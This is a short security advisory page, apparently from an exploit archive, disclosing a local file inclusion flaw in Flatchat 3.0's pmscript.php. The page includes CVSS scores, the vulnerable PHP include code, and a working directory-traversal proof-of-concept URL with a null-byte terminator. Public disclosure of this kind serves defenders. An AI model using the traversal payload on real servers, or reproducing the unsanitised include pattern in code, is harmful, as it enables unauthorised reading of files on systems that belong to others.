Flatchat 3.0 (pmscript.php with) Local File Inclusion Vulnerability

2009-04-29 / 2009-04-30
Credit: SirGod
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

########################################################################################## [+] Flatchat 3.0 (pmscript.php with) Local File Inclusion Vulnerability [+] Discovered By SirGod [+] www.mortal-team.net [+] www.h4cky0u.org ########################################################################################## [+] Homepage : http://ninjadesigns.co.uk/ [+] Local File Inclusion - Vulnerable code in pmscript.php -------------------------------------------- $filename = 'users/'.$_GET['with'].'.php'; if (file_exists($filename)) { include($filename); -------------------------------------------- http://127.0.0.1/path/pmscript.php?with=../../../../../BOOTSECT.BAK%00 ##########################################################################################

References:

http://www.milw0rm.com/exploits/8549


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top